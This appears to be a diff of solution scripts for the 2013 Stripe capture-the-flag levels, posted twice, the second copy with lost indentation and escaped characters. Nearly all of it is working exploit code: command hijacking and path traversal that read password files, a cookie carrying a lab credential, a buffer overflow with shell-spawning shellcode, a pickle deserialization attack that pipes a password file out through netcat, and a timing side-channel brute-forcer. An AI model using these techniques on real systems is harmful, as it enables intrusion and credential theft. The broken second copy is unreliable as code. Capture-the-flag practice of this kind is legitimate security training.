janosgyerik · October 3, 2013 21:18
diff --git a/level01-date b/level01-date
 #!/bin/sh

 cat /home/level02/.password
diff --git a/level02-exploit.sh b/level02-exploit.sh
 #!/bin/sh

 curl -u level02:kxlVXUvzv --digest -b "user_details=../../home/level03/.password
 " http://ctf.stri.pe/level02.php 
diff --git a/level03-exploit.sh b/level03-exploit.sh
 #!/bin/sh

 /levels/level03 -21 "cat /home/level04/.password $(printf "\x5b\x87\x04\x08")"
diff --git a/level04-exploit.sh b/level04-exploit.sh
 #!/bin/sh

 /levels/level04 $(ruby -e 'print "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41\x42\x42\x42\x42" + "\x90"*987 + "\x7b\x85\x04\x08"')
diff --git a/level05-exploit.py b/level05-exploit.py
 #!/usr/bin/python
 # Thanks to Evan Broder <[email protected]>
 import pickle
 import subprocess
 import urllib
 import socket

 class Gimme(object):
   def __reduce__(self):
       return (subprocess.Popen,
               (('/bin/sh', '-c',
                 'nc localhost 41803 </home/level06/.password'),))

 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.bind(('localhost', 41803))
 s.listen(1)
 urllib.urlopen('http://localhost:9020', '; job: ' + pickle.dumps(Gimme()))
 c, _ = s.accept()
 print c.recv(1024)
diff --git a/level06-exploit.rb b/level06-exploit.rb
 #!/usr/bin/env ruby
 # Thanks to Matt Page <[email protected]>
 BANNER_LEN = "Welcome to the password checker!\n".size
 PIPE_BUF_SIZE = 2 ** 16

 def check_guess(level_path, pwfile_path, guess)
 child_stderr = IO.pipe
 child_stdout = IO.pipe

 #system('clear')
 puts guess

 child_stderr[1].write("A" * (PIPE_BUF_SIZE - BANNER_LEN - guess.size))

 pid = fork do
   # Hook up write ends
   $stdout.reopen(child_stdout[1])
   $stderr.reopen(child_stderr[1])

   # Close read ends
   [child_stderr, child_stdout].map {|ios| ios[0].close }

   exec("#{level_path} #{pwfile_path} #{guess}x")
   # NOTREACHED
   exit(0)
 end

 # Close our write ends
 [child_stderr, child_stdout].map {|ios| ios[1].close }

 # 100ms *should* be enough time for the forked child to write to stdout
 # when we're wrong
 guess_correct = IO.select([child_stdout[0]], nil, nil, 0.1) == nil

 Process.kill("KILL", pid)
 Process.waitpid(pid)

 guess_correct
 ensure
 [child_stderr, child_stdout].flatten.each {|io| io.close unless io.closed? }
 end

 unless ARGV.size == 2
 puts "Usage: exploit06.rb [/path/to/level06] [/path/to/password_file]"
 exit 1
 end

 level_path, pwfile_path = ARGV

 charset = ['a'..'z', 'A'..'Z', '0'..'9'].map {|x| x.to_a}.flatten
 accum = ''
 while nil == `#{level_path} #{pwfile_path} #{accum} 2>&1`.match('Wait')
 #system('clear')
 #puts "RETRIEVED THUS FAR: '#{accum}'"

 retrieved_char = nil
 charset.each do |guess|
   if check_guess(level_path, pwfile_path, accum + guess)
     retrieved_char = guess
     accum += guess
     break
   end
 end

 unless retrieved_char
   abort("FAILED TO RETRIEVE CHARACTER")
 end
 end

 puts "PASSWORD: #{accum}"
	#!/bin/sh

	curl -u level02:kxlVXUvzv --digest -b "user_details=../../home/level03/.password
	" http://ctf.stri.pe/level02.php
	#!/bin/sh

	/levels/level03 -21 "cat /home/level04/.password $(printf "\x5b\x87\x04\x08")"
	#!/bin/sh

	/levels/level04 $(ruby -e 'print "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41\x42\x42\x42\x42" + "\x90"*987 + "\x7b\x85\x04\x08"')
	#!/usr/bin/python
	# Thanks to Evan Broder <[email protected]>
	import pickle
	import subprocess
	import urllib
	import socket

	class Gimme(object):
	def __reduce__(self):
	return (subprocess.Popen,
	(('/bin/sh', '-c',
	'nc localhost 41803 </home/level06/.password'),))

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.bind(('localhost', 41803))
	s.listen(1)
	urllib.urlopen('http://localhost:9020', '; job: ' + pickle.dumps(Gimme()))
	c, _ = s.accept()
	print c.recv(1024)
	#!/usr/bin/env ruby
	# Thanks to Matt Page <[email protected]>
	BANNER_LEN = "Welcome to the password checker!\n".size
	PIPE_BUF_SIZE = 2 ** 16

	def check_guess(level_path, pwfile_path, guess)
	child_stderr = IO.pipe
	child_stdout = IO.pipe

	#system('clear')
	puts guess

	child_stderr[1].write("A" * (PIPE_BUF_SIZE - BANNER_LEN - guess.size))

	pid = fork do
	# Hook up write ends
	$stdout.reopen(child_stdout[1])
	$stderr.reopen(child_stderr[1])

	# Close read ends
	[child_stderr, child_stdout].map {\|ios\| ios[0].close }

	exec("#{level_path} #{pwfile_path} #{guess}x")
	# NOTREACHED
	exit(0)
	end

	# Close our write ends
	[child_stderr, child_stdout].map {\|ios\| ios[1].close }

	# 100ms should be enough time for the forked child to write to stdout
	# when we're wrong
	guess_correct = IO.select([child_stdout[0]], nil, nil, 0.1) == nil

	Process.kill("KILL", pid)
	Process.waitpid(pid)

	guess_correct
	ensure
	[child_stderr, child_stdout].flatten.each {\|io\| io.close unless io.closed? }
	end

	unless ARGV.size == 2
	puts "Usage: exploit06.rb [/path/to/level06] [/path/to/password_file]"
	exit 1
	end

	level_path, pwfile_path = ARGV

	charset = ['a'..'z', 'A'..'Z', '0'..'9'].map {\|x\| x.to_a}.flatten
	accum = ''
	while nil == `#{level_path} #{pwfile_path} #{accum} 2>&1`.match('Wait')
	#system('clear')
	#puts "RETRIEVED THUS FAR: '#{accum}'"

	retrieved_char = nil
	charset.each do \|guess\|
	if check_guess(level_path, pwfile_path, accum + guess)
	retrieved_char = guess
	accum += guess
	break
	end
	end

	unless retrieved_char
	abort("FAILED TO RETRIEVE CHARACTER")
	end
	end

	puts "PASSWORD: #{accum}"